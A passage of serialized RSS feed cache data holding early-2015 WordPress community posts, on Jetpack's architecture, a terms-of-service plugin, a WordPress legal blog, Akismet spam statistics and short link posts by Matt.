production.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 20:31:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"WPTavern: Part 1: George Stephanis on Why Jetpack is Not a Collection of Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38269\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"http://wptavern.com/part-1-george-stephanis-on-why-jetpack-is-not-a-collection-of-plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2836:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/JetpackPluginCollectionFeaturedImage.png\" rel=\"prettyphoto[38269]\"><img class=\"size-full wp-image-38279\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/JetpackPluginCollectionFeaturedImage.png?resize=638%2C200\" alt=\"Jetpack Plugin Collection Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/northbaywanderer/121971388/\">northbaywanderer</a> &#8211; <a href=\"http://creativecommons.org/licenses/by-sa/2.0/\">cc</a>\n<p>George Stephanis, who is a member of the Jetpack Pit Crew, published a post over the weekend that explains why <a title=\"http://stephanis.info/2015/01/31/why-jetpack-isnt-a-collection-of-plugins-part-the-first/\" href=\"http://stephanis.info/2015/01/31/why-jetpack-isnt-a-collection-of-plugins-part-the-first/\">Jetpack is not a collection of plugins</a>. According to Stephanis, dependency management in WordPress sucks. In a nutshell, a dependency is when a library, framework, component, theme, or plugin requires the existence of another to function. He gives a practical example of dependencies that highlights how quickly things could get messy.</p>\n<blockquote><p>Now, if <strong>Likes</strong>, <strong>Single Sign On</strong>, <strong>After the Deadline</strong>, <strong>Post by Email</strong> and others were their own plugins, and connected to a separate <strong>Jetpack Core</strong> plugin, versioning gets tricky.  It could work, in theory, if every plugin is kept up to date, always and forever.  But the instant that the user is using, say, an outdated version of <strong>Subscriptions</strong> with an outdated <strong>Jetpack Core</strong> (which work perfectly together), and then installs the up-to-date <strong>WP.me Shortlinks</strong> plugin, things could break because <strong>WP.me Shortlinks</strong> expects a more up-to-date <strong>Jetpack Core</strong>.</p>\n<p>So you go ahead and update <strong>Jetpack Core</strong> to current, but now <strong>Subscriptions</strong> — which used to work perfectly — now breaks because there was a method change in <strong>Jetpack Core</strong>, that is fixed in the up-to-date version of <strong>Subscriptions</strong>, but the user isn’t running the up-to-date version.  Horrible UX.</p></blockquote>\n<p>He goes on to describe the installation flow for a plugin that needs Jetpack Core to function. A plugin that depends on Jetpack Core adds at least four additional steps to the installation flow.</p>\n<p>It&#8217;s a good article that answers the technical side of a commonly asked question. It also gives insight to those who may be thinking of creating alternatives to Jetpack using a similar model. In part two of the series, Stephanis plans to write about the variety of other reasons Jetpack is not a collection of plugins.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 17:46:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: How to Automatically Create Terms of Service and Privacy Policy Documents\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38257\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"http://wptavern.com/how-to-automatically-create-terms-of-service-and-privacy-policy-documents\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3716:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginFeaturedImage.png\" rel=\"prettyphoto[38257]\"><img class=\"aligncenter size-full wp-image-38262\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginFeaturedImage.png?resize=838%2C272\" alt=\"Auto Terms of Service Plugin Featured Image\" /></a></p>\n<p>If you own or operate a business and need a Terms of Service, Privacy, or various other legal documents, check out the <a title=\"https://github.com/Automattic/legalmattic\" href=\"https://github.com/Automattic/legalmattic\">Legalmattic repository</a> on Github. In 2014, Automattic open sourced all of its legal documents, including <a title=\"http://wptavern.com/automattic-open-sources-its-dmca-process-docs-on-github\" href=\"http://wptavern.com/automattic-open-sources-its-dmca-process-docs-on-github\">its DMCA takedown notice</a>. If you choose an Automattic legal document as a foundation to write your own, consider using the <a title=\"https://wordpress.org/plugins/auto-terms-of-service-and-privacy-policy/\" href=\"https://wordpress.org/plugins/auto-terms-of-service-and-privacy-policy/\">Auto Terms of Service and Privacy Policy plugin. </a></p>\n<p>Created by <a title=\"http://tourkick.com/\" href=\"http://tourkick.com/\">Clifford Paulick</a>, this plugin places the information entered into a version of Automattic&#8217;s <a href=\"http://en.wordpress.com/tos/\" rel=\"nofollow\">Terms of Service</a> and <a href=\"http://automattic.com/privacy/\" rel=\"nofollow\">Privacy Policy</a>, both available under the <a href=\"http://creativecommons.org/licenses/by-sa/3.0/\" rel=\"nofollow\">Creative Commons Sharealike</a> license. The documents are modified to exclude specifics to Automattic, such as mentions of Jetpack, WordPress.com, and VIP. Each document has generic language that can apply to most sites and service providers, including single sites, subscription sites, blog networks, and others.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginSettings.png\" rel=\"prettyphoto[38257]\"><img class=\"size-full wp-image-38258\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginSettings.png?resize=784%2C859\" alt=\"Add Your Company Info\" /></a>Add Your Company Info\n<p>Configuration is as simple as placing company information into the appropriate fields. Once entered, you&#8217;ll need to turn on the Display setting at the top to enable the three different shortcodes.</p>\n<ul>\n<li>[my_terms_of_service_and_privacy_policy]</li>\n<li>[my_terms_of_service]</li>\n<li>[my_privacy_policy]</li>\n</ul>\n<p>Here&#8217;s what the Tavern terms of service page looks like using the terms of service shortcode.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginResult.png\" rel=\"prettyphoto[38257]\"><img class=\"size-full wp-image-38259\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginResult.png?resize=731%2C826\" alt=\"Tavern Terms of Use Page\" /></a>Tavern Terms of Use Page\n<p>The plugin works as advertised and is a convenient way to provide legal documents if you&#8217;re a service provider like Automattic. However, if you need to fine tune the results, you can either copy the output from the shortcode and paste it into the page or use the source document from the <a title=\"https://github.com/Automattic/legalmattic\" href=\"https://github.com/Automattic/legalmattic\">Legalmattic repository</a>. While Automattic&#8217;s documents give you a head start, it&#8217;s probably still a good idea to seek legal counsel to review and edit them so they&#8217;re specifically tailored to your business.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 17:28:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: Richard Best Launches New Website Devoted to WordPress Legal Topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38247\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/richard-best-launches-new-website-devoted-to-wordpress-legal-topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2361:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/WPandLegalStuffFeaturedImage.png\" rel=\"prettyphoto[38247]\"><img class=\"size-full wp-image-38254\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/WPandLegalStuffFeaturedImage.png?resize=639%2C300\" alt=\"WP and Legal Stuff Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/c_nilsen/16359004332/\">c_nilsen</a> &#8211; <a href=\"http://creativecommons.org/licenses/by-nc-sa/2.0/\">cc</a>\n<p>Over the weekend, I stumbled across a new resource called <a title=\"http://wpandlegalstuff.com/\" href=\"http://wpandlegalstuff.com/\">WP and Legal Stuff </a>run by <a title=\"http://wpandlegalstuff.com/about/\" href=\"http://wpandlegalstuff.com/about/\">Richard Best</a>, a qualified lawyer in New Zealand, England, and Wales. The site focuses on legal matters related to WordPress and open source. Recent articles include:</p>\n<ul>\n<li><a title=\"http://wpandlegalstuff.com/using-wordpress-trademarks-business-product-service/\" href=\"http://wpandlegalstuff.com/using-wordpress-trademarks-business-product-service/\">Using the WordPress trademarks for your business, product or service</a></li>\n<li><a title=\"http://wpandlegalstuff.com/gpl-wpscan-vane/\" href=\"http://wpandlegalstuff.com/gpl-wpscan-vane/\">The GPL and the story of WPScan and Vane</a></li>\n<li><a title=\"http://wpandlegalstuff.com/automattic-open-licensing-open-data/\" href=\"http://wpandlegalstuff.com/automattic-open-licensing-open-data/\">Automattic, open licensing and open data</a></li>\n</ul>\n<p>His take on <a title=\"http://wpandlegalstuff.com/understanding-gpl-licensing-wordpress/\" href=\"http://wpandlegalstuff.com/understanding-gpl-licensing-wordpress/\">understanding the GPL licensing of WordPress</a> is a great primer for anyone not familiar with how it works. While Best does not give legal advice through the site, he provides an interesting perspective since most of the people who participate in WordPress legal discussions are not lawyers.</p>\n<p>WP and Legal Stuff is a unique site and one of the few to cover WordPress legal matters on a routine basis. I highly suggest you subscribe to <a title=\"http://wpandlegalstuff.com/feed/\" href=\"http://wpandlegalstuff.com/feed/\">his RSS feed</a> so you don&#8217;t miss his next post on WordPress themes, the GPL, and the conundrum of derivative works.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 16:37:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: Tech is Ridiculous\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44640\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://ma.tt/2015/02/tech-is-ridiculous/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:433:\"<blockquote><p>Yo&#8217;s Law: &#8220;in the 21st century tech industry, satire and reality are not merely indistinguishable but actually interchangeable.&#8221;</p></blockquote>\n<p>From Jon Evans&#8217; <a href=\"http://techcrunch.com/2015/01/24/this-industry-is-still-completely-ridiculous/\">This Industry Is Still Completely Ridiculous</a>, a hilarious article with a conclusion (the ridiculous stuff is worth it) I agree with.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 01 Feb 2015 22:12:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Akismet: January 2015 Stats Roundup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.akismet.com/?p=1777\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"http://blog.akismet.com/2015/02/01/january-2015-stats-roundup/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3884:\"<p>January has been a slow and steady month in Akismet-land. Whereas <a href=\"http://blog.akismet.com/2014/12/01/november-stats-roundup/\">in</a> <a href=\"http://blog.akismet.com/2014/10/01/september-stats-roundup/\">months</a> <a href=\"http://blog.akismet.com/2014/11/03/october-stats-roundup/\">prior</a>, we&#8217;ve broken daily spam records, in January the spammers took it easy and we never saw a day with over 300 million spam comments caught.</p>\n<div id=\"attachment_1778\" class=\"wp-caption alignnone\"><img class=\"size-large wp-image-1778\" src=\"https://akismet.files.wordpress.com/2015/02/akismet-spam-and-ham-stats-january-2015.png?w=700&h=438\" alt=\"graph of akismet spam and ham daily stats january 2015\" /><p class=\"wp-caption-text\">The busiest day in January was the 4th, with almost 257 million comments, and the slowest was the 29th with just over 174 million comments.</p></div>\n<p>The <strong>total number of spam comments caught in January was a mere 6,586,661,000</strong> &#8211; compare that to the over 10 billion comments in December,<strong> that&#8217;s a drop of 35%</strong>. We did have more comments this month than the same time last year &#8211; 5% more.</p>\n<div id=\"attachment_1780\" class=\"wp-caption alignright\"><img class=\"size-medium wp-image-1780\" src=\"https://akismet.files.wordpress.com/2015/02/antique-map-of-the-world.jpg?w=300&h=211\" alt=\"Antique map of the world\" width=\"300\" height=\"211\" /><p class=\"wp-caption-text\">This image, “<a href=\"https://www.flickr.com/photos/38703275@N06/6884641242\">Old Map (90)</a>” by <a href=\"https://www.flickr.com/photos/38703275@N06/\">rosario fiore</a>, is licensed under <a href=\"https://creativecommons.org/licenses/by-nd/2.0/\">CC BY-ND 2.0</a></p></div>\n<p>Let&#8217;s put this number in perspective. The latest figures for the world population were published in 2013 by the <a href=\"http://data.worldbank.org/\">world bank</a>, and the number was just over 7 billion.</p>\n<p>If we wrote down each spam comment caught this month on a piece of paper, and handed out each of these notes to one person in the world, we&#8217;d have enough people on earth to hold all of the papers. In fact, we&#8217;d have some people left over that didn&#8217;t need to hold a piece of paper.</p>\n<p>In contrast <strong>there were only 157,555,500 legitimate comments that came through</strong> this month. <strong>Legitimate comments account for about 2%</strong> of all the content Akismet sees come through.</p>\n<p>If we wrote down each legitimate comment we got this month on a piece of paper and gave each to one person, we&#8217;d need just 2% of the world population in order to hold them all.</p>\n<p>As for Akismet&#8217;s uptime: there were no service interruptions this month. You can find information about any performance issues on this blog, via <a href=\"https://twitter.com/akismet\">Twitter</a>, and on this <a href=\"http://status.automattic.com/9931/136079/Akismet-API\">status page</a>.</p>\n<p>You may have also seen a drop in spam comments this month on your own blog. If you are having any issues with spam or with Akismet, please feel free to <a href=\"http://akismet.com/contact/\">contact us</a>, we&#8217;re happy to help <span class=\"wp-smiley wp-emoji wp-emoji-mrgreen\" title=\":mrgreen:\">:mrgreen:</span>.</p>\n<p><em>This post is part of a monthly series summarizing some stats and figures from the Akismet universe. Feel free to browse <a href=\"http://blog.akismet.com/category/monthly-roundup/\">all of the posts in the series</a>.</em></p><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/akismet.wordpress.com/1777/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/akismet.wordpress.com/1777/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.akismet.com&blog=116920&post=1777&subd=akismet&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 01 Feb 2015 16:57:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Valerie\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Matt: Federated Wikipedia\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44622\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"http://ma.tt/2015/01/federated-wikipedia/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:475:\"<p><a href=\"http://blog.jonudell.net/2015/01/22/a-federated-wikipedia/\">A federated Wikipedia by Jon Udell</a> talks about the ossification happening in the Wikipedia community, caused in part by its attachment to rules that were created with the best of intentions. All open source communities, including <a href=\"http://wordpress.org/\">WordPress</a>, have to be vigilant against this. Sometimes we have to throw out what worked before to create what will work tomorrow.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 31 Jan 2015 22:50:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Matt: John Scalzi on Semicolons\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44629\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"http://ma.tt/2015/01/john-scalzi-on-semicolons/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:965:\"<blockquote><p>I write novels. And with just about every novel I write, I try to do something new or different that I haven’t done before, in order to challenge myself as a writer, and to keep developing my skills. In The Android’s Dream, of example, I wrote in the third person for the first time; in Zoe’s Tale, I had a main character—a sixteen year old girl—whose life experience was substantially different from my own; with The Human Division, I wrote a novel comprised of thirteen stand-alone “episodes.”</p>\n<p>And now? With Lock In? What new thing have I done to stretch myself as a writer and teller of tales? Well, I’ll tell you; it’s something I’m really proud of, actually:</p>\n<p>I’ve written a novel entirely free of semicolons.</p></blockquote>\n<p>John Scalzi in <a href=\"http://torforgeblog.com/2014/08/04/pacing-doesnt-just-mean-wearing-a-groove-in-the-floor/\">Pacing Doesn’t Just Mean Wearing a Groove in the Floor</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 31 Jan 2015 05:03:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WPTavern: Improvements to the Features as Plugins First Model\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38159\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"http://wptavern.com/improvements-to-the-features-as-plugins-first-model\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4185:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/FeaturePluginModelImprovementFeaturedImage.png\" rel=\"prettyphoto[38159]\"><img class=\"size-full wp-image-38232\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/FeaturePluginModelImprovementFeaturedImage.png?resize=640%2C300\" alt=\"Feature Plugin Improvements\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/terrancedc/9083765513/\">TerranceDC</a> &#8211; <a href=\"http://creativecommons.org/licenses/by-nc/2.0/\">cc</a>\n<p>Earlier this month, I described how the <a title=\"http://wptavern.com/the-features-as-plugins-first-model-is-a-mess\" href=\"http://wptavern.com/the-features-as-plugins-first-model-is-a-mess\">features as plugins first model is a mess</a>. Drew Jaynes, who is <a title=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\" href=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\">leading the development cycle for WordPress 4.2</a>, is already making headway into improving the model. Unlike previous release cycles, feature plugins that are likely to be merged into WordPress have been <a title=\"https://make.wordpress.org/core/2015/01/29/dev-chat-summary-january-28th/\" href=\"https://make.wordpress.org/core/2015/01/29/dev-chat-summary-january-28th/\">assigned a core mentor</a> at the beginning of the cycle. Assigning mentors at the beginning of the dev cycle should help make the merge process smoother and keep each project within scope.</p>\n<h2>Improved Communication</h2>\n<p>One of the biggest issues I have with feature plugins is the lack of 